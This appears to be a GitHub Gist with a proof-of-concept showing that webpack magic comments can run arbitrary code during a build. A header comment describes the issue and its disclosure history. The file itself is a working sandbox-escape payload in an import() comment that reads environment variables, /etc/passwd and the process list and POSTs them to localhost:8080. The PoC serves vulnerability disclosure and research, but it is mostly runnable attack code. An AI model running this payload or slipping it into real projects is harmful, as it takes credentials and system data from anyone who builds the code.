Last active
February 21, 2021 08:33
-
-
Save allanlw/9df6a260d689500c7e25cb9a56bdd54d to your computer and use it in GitHub Desktop.
POC for executing webpack code through webpack imort magic comments
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
It's possible to execute arbitrary code during webpack execution by abusing the magic | |
comment feature documented here: https://webpack.js.org/api/module-methods/#magic-comments | |
These comments eventually get executed by `vm.runInContext` which is well-known to be unsafe | |
at https://github.com/webpack/webpack/blob/v4.43.0/lib/Parser.js#L2338 | |
This is an example payload that reads process.env, ps aux and /etc/passwd and posts to localhost:8080. | |
Reported to NPM security for webpack July 12th, 2020, but considered not a bug. | |
See also: | |
- I answered a stack overflow question about this: https://stackoverflow.com/a/66300450/315936 | |
- It seems you can also use inline loaders for this too: https://github.com/webpack/webpack/issues/10231 | |
Cudos to | |
https://github.com/patriksimek/vm2/issues/32#issue-160537607 | |
https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html | |
*/ | |
import( | |
/* webpackChunkName: this.constructor.constructor(`(function() { | |
let Function = this.constructor.constructor; | |
let process = new Function('return process')(); | |
let require = process.mainModule.require; | |
let http = require('http'); | |
let fs = require('fs'); | |
let buffer = require('buffer'); | |
let child_process = require('child_process'); | |
let payload = { | |
'env': process.env, | |
'passwd': fs.readFileSync('/etc/passwd').toString(), | |
'ps': child_process.execSync('ps aux').toString(), | |
}; | |
let data = buffer.Buffer.from(JSON.stringify(payload)); | |
let req = http.request('http://localhost:8080/', { | |
'method': "POST", | |
'headers': { | |
"Content-Type": "application/json", | |
"Content-Length": data.length, | |
} | |
}); | |
req.write(data); | |
req.end(); | |
})()`)() */ | |
'buffer' | |
); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment